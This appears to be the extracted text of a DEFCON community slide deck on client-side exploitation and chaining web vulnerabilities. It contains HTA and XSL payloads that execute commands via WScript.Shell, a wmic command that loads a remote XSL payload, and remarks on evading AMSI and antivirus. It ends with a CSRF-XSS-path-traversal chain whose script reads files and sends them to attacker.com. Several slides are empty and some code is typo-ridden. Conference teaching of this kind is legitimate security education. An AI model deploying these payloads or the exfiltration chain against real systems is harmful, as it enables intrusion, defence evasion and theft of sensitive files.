DEFCON DC3158
Summary Summary Client Side Exploitation Attack Chaining.
Client Side Exploitation Script Based Attack Powershell,Jscript,Vbscript Vbscript:still people use IE, you can call wmic and powershell script to execute. • But Antivirus started flag powershell script . •
Client Side Exploitation AMSI(Antimalware Scan Interface) Stream scanning on memory,file and URL. • Can be integrated in any application. • Most of the antivirus use it. •
Client Side Exploitation How Do We Bypass HTA and XSL. • What is HTA? HTA’s are short for HTML Applications. And they’re basically a way to run a HTML app in a popout view, and are treated similar to an actual application, except they’re written in HTML. Ability to execute vbscript, which means you can execute commands. < script language="VBScript"> set objShell = CreateObject("Wscript.Shell") objShell.run "calc.exe" self.close </ script >
Client Side Exploitation What is XSL? XSL, aka XLST, is a Microsoft Stylesheet Script Format . These payloads also contain the ability to run Microsoft scripting languages. <?xml version='1.0'?> < stylesheet xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt" xmlns:user="placeholder" version="1.0"> < output method="text"/> < ms:script implements-prefix="user" language="JScript"> <![CDATA[ var r = new ActiveXObject("WScript.Shell").Run("calc.exe"); ]]> </ ms:script > </ stylesheet > Really cool thing with XSL file can load it in the windows command line remotely with WMI. wmic os get /FORMAT:"http://xx.xx.xx.xx/payload.xsl"
Client Side Exploitation
Client Side Exploitation
Client Side Exploitation
Client Side Exploitation
Attack Chaining
Attack Chaining CSRF Page will do XSS Request XSS Will give request to path Travsel Attack Chaining Using Path Travsel we could able read to sensitive information (like WAS Password File) Response of the path travesel will append to xss request.
Attack Chaining 2 pages with 3 vulnerabilities: Authenticated XSS with no CSRF http://victim.com/authenticated/search?query=XSS authenticated path traversal page http://victim.com/authenticated/catFile.php?file=file.php Attack Chaining to bypass the authentication and dowload file and send to attacler! CSRF to bypass - create page containing an image that initiates the csrf and gets initial code execution using the search <img scr="http://victim.com/authenticated/search?query="><script src='http://attacker.com/xmlhttp-request.js></script>'" -------- "xmlhttp- request.js“ ----------------- http=new XMLHttpRequest(); http.onreadystatechange = function() { if (http.readyState==4) { window.location="http://www.attacker.com/" + http.responseText; } } http.open("GET","http://victim.com/authenticated/catFile.php?file=../../../../../../.././../../../",true); http.withCredentials = true; http.send(); } ------ END FILE ---------------------------------------
Attack Chaining
Recommend
More recommend